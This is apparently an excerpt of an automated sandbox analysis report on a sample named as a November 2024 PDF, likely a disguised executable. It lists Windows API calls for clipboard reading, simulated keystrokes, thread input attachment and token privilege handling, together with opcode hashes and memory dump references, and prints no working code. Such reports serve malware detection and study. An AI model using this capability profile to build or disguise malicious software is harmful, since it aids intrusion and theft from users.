                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: dcd0d1a8eba5f5b60ce762266c1aff30878f14b080df23a684a7caa9d7a068f8
                                                                                                                      • Instruction ID: eee0fb71e6c985d6b62a3314a1579a11ab5c962b3c24c7cc9a1f9c43fadf9e2c
                                                                                                                      • Opcode Fuzzy Hash: dcd0d1a8eba5f5b60ce762266c1aff30878f14b080df23a684a7caa9d7a068f8
                                                                                                                      • Instruction Fuzzy Hash: BFF03071105711CFCB349F68D494852BBF1BF0432A3288A3EE9D782650C7B99898DF50
                                                                                                                      Function 007709D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2514874351-0
                                                                                                                      • Opcode ID: 085f7ec440f578a7176cf434be8f9b1561513460affa0a80cc4d5f601671569a
                                                                                                                      • Instruction ID: 93d51480866b3feb73c196d87c2d80b8112b3f080dfbf324821a5947876f5a4f
                                                                                                                      • Opcode Fuzzy Hash: 085f7ec440f578a7176cf434be8f9b1561513460affa0a80cc4d5f601671569a
                                                                                                                      • Instruction Fuzzy Hash: AEE0CD76A4522C97C720E6589C09FFA77FDDF88791F0441B6FC0CD7244E9A5AC818690
                                                                                                                      Function 007B9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2638373210-0
                                                                                                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                                                                      • Instruction ID: 4f921e83a5e53f998686c0c67a99ed12a5746348ad61835b44af2eafafe11f8b
                                                                                                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                                                                      • Instruction Fuzzy Hash: 54E092B0104B049FDB348A28D8147E373E0AB06315F00081DF3AA83341EB6778419759
                                                                                                                      Function 0077548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction ID: 6c32f6abe5a8c2872584f5f5855b410fbfd7bb3fa0f240d0a093b9aea3742cf7
                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction Fuzzy Hash: 99B0927684020CB7DE012F92EC06A593B199B406B8F808020FB0C18162A6B7A6A09689
                                                                                                                      Function 00770E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: 6b5b43f1cc8ab8cf2c757d539664c204df415b16cbec2a896973d4f92ceb9eb6
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 5931AF71A00105DFCB18EE58D480969F7A6FB59380B68CAA5E40ACB651DB75EEC1CBC0
                                                                                                                      Function 018D22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 018D22B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: f4c423a7f64160403e767658c5711b2b6590e0d32f280ee9df10749f2573879f
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: FDE0E67494020EDFDB00EFB4D54969E7FB4EF04301F100161FD01D2281D6309E509A72

                                                                                                                      Non-executed Functions

                                                                                                                      Function 007DCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007DCE50
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCE91
                                                                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 007DCED6
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCF00
                                                                                                                      • SendMessageW.USER32 ref: 007DCF29
                                                                                                                      • _wcsncpy.LIBCMT ref: 007DCFA1
                                                                                                                      • GetKeyState.USER32(00000011), ref: 007DCFC2
                                                                                                                      • GetKeyState.USER32(00000009), ref: 007DCFCF
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCFE5
                                                                                                                      • GetKeyState.USER32(00000010), ref: 007DCFEF
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DD018
                                                                                                                      • SendMessageW.USER32 ref: 007DD03F
                                                                                                                      • SendMessageW.USER32(?,00001030,?,007DB602), ref: 007DD145
                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007DD15B
                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007DD16E
                                                                                                                      • SetCapture.USER32(?), ref: 007DD177
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 007DD1DC
                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007DD1E9
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DD203
                                                                                                                      • ReleaseCapture.USER32 ref: 007DD20E
                                                                                                                      • GetCursorPos.USER32(?), ref: 007DD248
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 007DD255
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD2B1
                                                                                                                      • SendMessageW.USER32 ref: 007DD2DF
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD31C
                                                                                                                      • SendMessageW.USER32 ref: 007DD34B
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DD36C
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DD37B
                                                                                                                      • GetCursorPos.USER32(?), ref: 007DD39B
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 007DD3A8
                                                                                                                      • GetParent.USER32(?), ref: 007DD3C8
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD431
                                                                                                                      • SendMessageW.USER32 ref: 007DD462
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 007DD4C0
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DD4F0
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD51A
                                                                                                                      • SendMessageW.USER32 ref: 007DD53D
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 007DD58F
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DD5C3
                                                                                                                        • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007DD65F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                      • API String ID: 3977979337-4164748364
                                                                                                                      • Opcode ID: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
                                                                                                                      • Instruction ID: dd6fb6bbbb91a6a51723c0a86d7caba234147e1f3c135aa906ac42d2e08f79a3
                                                                                                                      • Opcode Fuzzy Hash: d506195aa608ec61a2df23d07b81a305c8ebb6b62a3a922996fa7dabab31f377
                                                                                                                      • Instruction Fuzzy Hash: 28428C70209251AFD722CF28C848AAABBF5FF48314F14452EF696973A1D739D854CF92
                                                                                                                      Function 007D804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007D873F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: %d/%02d/%02d
                                                                                                                      • API String ID: 3850602802-328681919
                                                                                                                      • Opcode ID: 7424becc3d2f147f9a1953321bd5e8c99279fa58993c8eb8bc9700c804debd2f
                                                                                                                      • Instruction ID: 4421318b62d5a929ca149abecdc773add703dab6dd4ed697e70e832e496413e4
                                                                                                                      • Opcode Fuzzy Hash: 7424becc3d2f147f9a1953321bd5e8c99279fa58993c8eb8bc9700c804debd2f
                                                                                                                      • Instruction Fuzzy Hash: F812E471501208EFEB658F68CC49FAE7BB8EF45710F14812AF916EA2E1DF789941CB11
                                                                                                                      Function 0076710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_memset
                                                                                                                      • String ID: DEFINE$Oav$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                      • API String ID: 1357608183-3379304892
                                                                                                                      • Opcode ID: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
                                                                                                                      • Instruction ID: 6e3956deca3e1ea21a2e7347570d878dd05f40e8d75d4ea51f75d0d99c68a7b0
                                                                                                                      • Opcode Fuzzy Hash: 051e3f1b0b4cd0a151cde6f30f7d9e9bcb609941cb79786ebbce103d6ca9c9d1
                                                                                                                      • Instruction Fuzzy Hash: BC93A371E04215DFDB28CF58C8817ADB7B1FF89314F24826AE945EB281E7799E81CB50
                                                                                                                      Function 00754A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(00000000,?), ref: 00754A3D
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078DA8E
                                                                                                                      • IsIconic.USER32(?), ref: 0078DA97
                                                                                                                      • ShowWindow.USER32(?,00000009), ref: 0078DAA4
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0078DAAE
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078DAC4
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0078DACB
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0078DAD7
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAE8
                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078DAF0
                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0078DAF8
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0078DAFB
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB10
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0078DB1B
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB25
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0078DB2A
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB33
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0078DB38
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078DB42
                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0078DB47
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0078DB4A
                                                                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 0078DB71
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 4125248594-2988720461
                                                                                                                      • Opcode ID: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
                                                                                                                      • Instruction ID: 90e7a6d64bad194c5cb69a1dd240ac80b3016d617f9e79d83e3a82c7d2f91f26
                                                                                                                      • Opcode Fuzzy Hash: 21da387f6a263bf5fca5929c8bc336ac1cde4adac034c02ff43fcd97d091f6ee
                                                                                                                      • Instruction Fuzzy Hash: 7E317571A81318BBEB306FA19C49F7E3F7CEB44B50F158066FA06E61D0C6B45D10ABA5
                                                                                                                      Function 007A8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A8D0D
                                                                                                                        • Part of subcall function 007A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8D3A
                                                                                                                        • Part of subcall function 007A8CC3: GetLastError.KERNEL32 ref: 007A8D47
                                                                                                                      • _memset.LIBCMT ref: 007A889B
                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007A88ED
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007A88FE
                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007A8915
                                                                                                                      • GetProcessWindowStation.USER32 ref: 007A892E
                                                                                                                      • SetProcessWindowStation.USER32(00000000), ref: 007A8938
                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007A8952
                                                                                                                        • Part of subcall function 007A8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                                                                                                                        • Part of subcall function 007A8713: CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                      • String ID: $default$winsta0
                                                                                                                      • API String ID: 2063423040-1027155976
                                                                                                                      • Opcode ID: 577c37cbb0ffcda892205533cc9e05b9e70a2d022b87905cdba06a7d313856ec
                                                                                                                      • Instruction ID: 4ef5a74cbb2cc8fbffe266477cb831af0fe22809a886aced338bcc874b8522eb
                                                                                                                      • Opcode Fuzzy Hash: 577c37cbb0ffcda892205533cc9e05b9e70a2d022b87905cdba06a7d313856ec
                                                                                                                      • Instruction Fuzzy Hash: 4A818D71901209EFDF51DFA4CC49AEE7BB8FF45304F08826AF911A6261DB398E14DB61
                                                                                                                      Function 007C425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenClipboard.USER32(007DF910), ref: 007C4284
                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 007C4292
                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 007C429A
                                                                                                                      • CloseClipboard.USER32 ref: 007C42A6
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 007C42C2
                                                                                                                      • CloseClipboard.USER32 ref: 007C42CC
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 007C42E1
                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 007C42EE
                                                                                                                      • GetClipboardData.USER32(00000001), ref: 007C42F6
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 007C4303
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 007C4337
                                                                                                                      • CloseClipboard.USER32 ref: 007C4447
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3222323430-0
                                                                                                                      • Opcode ID: dc00600e37ec9fe92f46fe34cf3dba2491c2332f3654fd8791259f8ca78cfc9a
                                                                                                                      • Instruction ID: 114aca2aaa43bd58afc2031bccd98958a78d3bc94bc9154faeacb61435369e2f
                                                                                                                      • Opcode Fuzzy Hash: dc00600e37ec9fe92f46fe34cf3dba2491c2332f3654fd8791259f8ca78cfc9a
                                                                                                                      • Instruction Fuzzy Hash: 4D51B271204301ABD311EF60EC9AFAE77B8BF84B01F14852EF956D21A1DB78D904CB66
                                                                                                                      Function 007BC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007BC9F8
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BCA4C
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA71
                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA88
                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007BCAAF
                                                                                                                      • __swprintf.LIBCMT ref: 007BCAFB
                                                                                                                      • __swprintf.LIBCMT ref: 007BCB3E
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                      • __swprintf.LIBCMT ref: 007BCB92
                                                                                                                        • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                                                                                                                      • __swprintf.LIBCMT ref: 007BCBE0
                                                                                                                        • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 00773953
                                                                                                                        • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 0077396B
                                                                                                                      • __swprintf.LIBCMT ref: 007BCC2F
                                                                                                                      • __swprintf.LIBCMT ref: 007BCC7E
                                                                                                                      • __swprintf.LIBCMT ref: 007BCCCD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
